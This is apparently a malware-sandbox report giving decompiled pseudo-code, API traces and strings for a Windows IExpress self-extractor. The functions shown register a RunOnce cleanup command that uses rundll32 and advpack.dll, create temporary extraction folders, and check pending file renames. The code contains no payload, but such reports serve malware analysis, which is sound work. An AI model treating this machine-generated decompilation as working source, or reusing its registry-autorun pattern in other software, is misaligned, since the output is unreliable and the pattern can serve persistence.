				_t87 = 0;
				while(1) {
					E0007171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0007658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x79a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x791e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x791e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x791e5);
						if(_t90 != 0) {
							 *0x78580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
							E0007171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E000744B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0007658A( &_v268, 0x104, 0x71140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x78530 = _t66;
				goto L23;
			}

0x0007202a
0x00072035
0x0007203c
0x00072041
0x00072050
0x0007205f
0x00072064
0x0007206f
0x0007208c
0x00072094
0x00072257
0x00072266
0x00072266
0x0007209a
0x0007209b
0x0007209d
0x000720aa
0x000720af
0x000720c9
0x000720d1
0x00000000
0x00000000
0x000720d3
0x000720da
0x00000000
0x00000000
0x00000000
0x000720da
0x000720e2
0x00072103
0x0007210e
0x00072116
0x00072122
0x00072128
0x0007212c
0x00072179
0x00072194
0x000721de
0x000721e4
0x00072256
0x00072256
0x00000000
0x00072256
0x00072196
0x00072196
0x0007219c
0x0007219f
0x0007219f
0x000721a1
0x000721a2
0x000721a6
0x000721a8
0x000721b0
0x000721b0
0x000721b2
0x000721b3
0x000721bc
0x000721c7
0x000721cb
0x000721f1
0x000721f6
0x000721fd
0x000721ff
0x000721ff
0x00072204
0x00072213
0x00072218
0x0007221d
0x0007221d
0x00072220
0x00072220
0x00072222
0x00072223
0x00072229
0x0007223d
0x00072249
0x00072250
0x00000000
0x00072250
0x000721d2
0x000721d9
0x00000000
0x000721d9
0x0007213a
0x00072141
0x00072144
0x0007214c
0x00000000
0x00000000
0x00072163
0x00072172
0x00072172
0x00000000
0x00072163
0x000720ea
0x000720f0
0x00000000

APIs

memset.MSVCRT ref: 00072050
memset.MSVCRT ref: 0007205F
RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0007208C

Part of subcall function 0007171E: _vsnprintf.MSVCRT ref: 00071750

RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000720C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000720EA
GetSystemDirectoryA.KERNEL32 ref: 00072103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00072122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00072134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00072144
GetSystemDirectoryA.KERNEL32 ref: 0007215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0007218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000721C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 000721E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0007223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00072249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00072250

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000721A8, 00072204
DelNodeRunDLL32, xrefs: 0007212E
wextract_cleanup%d, xrefs: 0007209E
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00072082
wextract_cleanup0, xrefs: 000720A5, 000720BE, 000720F0, 00072232
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 000721F6
%s /D:%s, xrefs: 000721FF, 00072210
advpack.dll, xrefs: 00072109

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
API String ID: 178549006-1709460465
Opcode ID: b5618f93710e2df2bc041851bb9caa2dd99c3ed086dc17460e043ed4d9b470ac
Instruction ID: e697c2edce5da745c51d292ebcd73c9e431a6ebeb0fd56f0a4a6c73874ee157f
Opcode Fuzzy Hash: b5618f93710e2df2bc041851bb9caa2dd99c3ed086dc17460e043ed4d9b470ac
Instruction Fuzzy Hash: 4F51F671E40214ABEB209B64DC4DFEA776CFB91700F00C1A8BA4DE6151DA7D9D85CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000755A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E000755A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x78004; // 0xdaa0d862
				_v8 = _t28 ^ _t110;
				_t2 = E0007468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0007468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x79a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x78b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x78a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00076517(_t82, 0x7d2, 0, E00073210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x79a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x791e4;
									_t40 = GetTempPathA(0x104, 0x791e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00071781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00076952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0007597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00072630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0007658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x791e4;
																					E00071781(0x791e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00075467(0x791e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00072630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0007597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00075467(0x791e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x791e4;
											_t70 = E00072630(0, 0x791e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x791e4;
												_t71 = E00075467(0x791e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0007597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x78b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00075467(0x78b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E000744B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E000744B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x79124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E000744B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x79124 = E00076285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00076CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x000755ab
0x000755b2
0x000755c9
0x000755d5
0x000755d9
0x00075600
0x00075605
0x0007560a
0x0007560c
0x00075638
0x00075641
0x00075643
0x00075645
0x00075645
0x0007564c
0x00075652
0x00075657
0x00075659
0x00075696
0x0007569c
0x0007589f
0x000758a7
0x000758ac
0x000758b3
0x000758b5
0x000756a2
0x000756a2
0x000756a8
0x00000000
0x000756ae
0x000756ae
0x000756b9
0x000756bf
0x000756c1
0x000756f3
0x000756f3
0x00075705
0x0007570a
0x00075711
0x00075717
0x00075724
0x00075726
0x00075729
0x00075730
0x00075737
0x0007573d
0x00075740
0x00000000
0x00000000
0x00000000
0x00000000
0x0007572b
0x0007572b
0x0007572e
0x00075742
0x00075742
0x00075745
0x0007576b
0x0007576b
0x00000000
0x00075747
0x00075747
0x0007574d
0x0007574f
0x00075771
0x00075771
0x00075773
0x00000000
0x00075751
0x00075751
0x00075753
0x00000000
0x00075755
0x0007575b
0x00075760
0x00075762
0x00000000
0x00075764
0x00075764
0x00075769
0x0007577e
0x0007577e
0x00075781
0x00075788
0x0007578d
0x0007578f
0x000757b2
0x000757b8
0x000757bd
0x000757bf
0x000757cd
0x000757cd
0x000757dd
0x000757e3
0x000757ef
0x000757f5
0x000757f8
0x0007580a
0x0007580a
0x000757fa
0x00075802
0x00075802
0x0007580d
0x0007580f
0x00075830
0x00075836
0x0007583d
0x0007584b
0x00075851
0x00075855
0x0007585a
0x0007585c
0x00000000
0x0007585e
0x0007585e
0x00000000
0x0007585e
0x00075811
0x00075817
0x00075819
0x0007581f
0x00000000
0x0007581f
0x00075791
0x00075797
0x0007579c
0x0007579e
0x00000000
0x000757a0
0x000757a9
0x000757ae
0x000757b0
0x00000000
0x00000000
0x00000000
0x00000000
0x000757b0
0x0007579e
0x00000000
0x00000000
0x00000000
0x00075769
0x00075762
0x00075753
0x0007574f
0x00000000
0x00000000
0x00000000
0x0007572e
0x00000000
0x00075864
0x00075864
0x00075864
0x00075717
0x00000000
0x000756c3
0x000756c5
0x000756c9
0x000756ce
0x000756d0
0x00000000
0x000756d6
0x000756d6
0x000756d8
0x000756dd
0x000756df
0x00000000
0x000756e1
0x000756e2
0x000756e4
0x000756e6
0x000756eb
0x000756ed
0x00000000
0x000756f3
0x000756f3
0x00000000
0x0007586c
0x00075878
0x0007587e
0x00075882
0x00075883
0x00075889
0x0007588e
0x0007588e
0x00000000
0x00075896
0x000756ed
0x000756df
0x000756d0
0x000756c1
0x000756a8
0x0007565b
0x0007565b
0x0007565d
0x00075669
0x00075669
0x0007565f
0x0007565f
0x00075665
0x00075667
0x00000000
0x00000000
0x00075667
0x0007566c
0x00075673
0x00075678
0x0007567a
0x0007589b
0x0007589b
0x00075680
0x00075685
0x0007568c
0x00000000
0x0007568c
0x0007567a
0x0007560e
0x00075613
0x0007561a
0x00075620
0x00075626
0x00000000
0x00075626
0x000755db
0x000755e0
0x000755e7
0x000755f1
0x000755f6
0x000755f6
0x000755f6
0x000758b7
0x000758c7

APIs

Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746A0
Part of subcall function 0007468F: SizeofResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746A9
Part of subcall function 0007468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000746C3
Part of subcall function 0007468F: LoadResource.KERNEL32(00000000,00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746CC
Part of subcall function 0007468F: LockResource.KERNEL32(00000000,?,00072D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000746D3
Part of subcall function 0007468F: memcpy_s.MSVCRT ref: 000746E5
Part of subcall function 0007468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000746EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000755CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00075638
LocalFree.KERNEL32(00000000), ref: 0007564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00075620

Part of subcall function 000744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00074518
Part of subcall function 000744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00074554

Part of subcall function 00076285: GetLastError.KERNEL32(00075BBC), ref: 00076285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 000756B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0007571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00075737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000757CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000757EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00075802

Part of subcall function 00072630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00072654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00075830

Part of subcall function 00076517: FindResourceA.KERNEL32(00070000,000007D6,00000005), ref: 0007652A
Part of subcall function 00076517: LoadResource.KERNEL32(00070000,00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00076538
Part of subcall function 00076517: DialogBoxIndirectParamA.USER32(00070000,00000000,00000547,000719E0,00000000), ref: 00076557
Part of subcall function 00076517: FreeResource.KERNEL32(00000000,?,?,00072EE8,00000000,000719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00076560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00075878

Part of subcall function 0007597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000759A8
Part of subcall function 0007597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000759AF

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000756AE, 000756B3, 0007583D
A:\, xrefs: 000756F4
Z, xrefs: 0007570A
msdownld.tmp, xrefs: 000757D3
<None>, xrefs: 00075632
RUNPROGRAM, xrefs: 000755BD, 00075600

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-559629209
Opcode ID: a69dd0b60becc18f5b43e008b0f8c4b2cbc8dc8969ae52b0926508bb65e2eecd
Instruction ID: 844bec27ea3b5fea919aa50a94e24f0bab2b1db7dc65d00c6367f2f9af281618
Opcode Fuzzy Hash: a69dd0b60becc18f5b43e008b0f8c4b2cbc8dc8969ae52b0926508bb65e2eecd
Instruction Fuzzy Hash: DA810770F04A045BEBA4AB649C45BEE72AD9B51302F04C465F58EE2192DFFC8DC1CA5D

Uniqueness

Uniqueness Score: -1.00%

Function 000753A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E000753A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x78004; // 0xdaa0d862
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0007171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00071680(_t32, 0x104, _t20);
					E0007658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00076CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x78a20 = 1;
				goto L5;
			}

0x000753ac
0x000753b3
0x000753b9
0x000753bb
0x000753bd
0x000753bf
0x000753d1
0x000753d6
0x000753e0
0x000753e2
0x000753f5
0x000753fb
0x00075402
0x0007540b
0x00000000
0x00000000
0x00075413
0x00000000
0x00000000
0x00075415
0x00075416
0x00075427
0x0007542a
0x0007542b
0x00075434
0x00075434
0x0007543a
0x0007544c
0x0007544c
0x00075452
0x0007545a
0x00000000
0x00000000
0x0007545e
0x0007545f
0x00000000

APIs

Part of subcall function 0007171E: _vsnprintf.MSVCRT ref: 00071750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000753FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00075402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0007541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0007542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00075434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00075452

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 000753B7, 000753E1, 0007541E
IXP, xrefs: 00075419
IXP%03d.TMP, xrefs: 000753C0

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-2659685179
Opcode ID: 2d419401d7af156d1ea43a8d2b9a17320f35692d18dbe38fd3e446b6bf4fc9e9
Instruction ID: 202bc7fd2d0c1ef82fda8236591191a82ec7b0e0c994e9339cd9d3d90095f587
Opcode Fuzzy Hash: 2d419401d7af156d1ea43a8d2b9a17320f35692d18dbe38fd3e446b6bf4fc9e9
Instruction Fuzzy Hash: D711C871F0050467F7209B269C49FEF766DEBC6716F008525B64EE21D1CEBC898286A9

Uniqueness

Uniqueness Score: -1.00%

Function 0007256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E0007256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E000724E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}

0x00072572
0x00072573
0x00072575
0x00072578
0x0007257d
0x00072627
0x00072583
0x00072586
0x00072589
0x000725eb
0x00072607
0x00000000
0x00072609
0x0007261a
0x00000000
0x0007261a
0x00000000
0x0007258b
0x0007258b
0x0007259e
0x000725b2
0x000725ba
0x000725cb
0x000725d1
0x000725d6
0x000725da
0x000725dd
0x000725dd
0x000725e3
0x000725e3
0x000725e3
0x0007258b
0x00072589
0x0007262f
0x00000000

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,00074096,00074096,?,00071ED3,00000001,00000000,?,?,00074137,?), ref: 000725B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00074096,?,00071ED3,00000001,00000000,?,?,00074137,?,00074096), ref: 000725CB
RegCloseKey.KERNELBASE(?,?,00071ED3,00000001,00000000,?,?,00074137,?,00074096), ref: 000725DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,00074096,00074096,?,00071ED3,00000001,00000000,?,?,00074137,?), ref: 000725FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00074096,00000000,00000000,00000000,00000000,?,00071ED3,00000001,00000000), ref: 0007261A

Strings

System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000725F5
System\CurrentControlSet\Control\Session Manager, xrefs: 000725A8
PendingFileRenameOperations, xrefs: 000725C3

Memory Dump Source

Source File: 00000000.00000002.366240918.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true

Associated: 00000000.00000002.366231212.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366252053.0000000000078000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366261405.000000000007C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70000_file.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
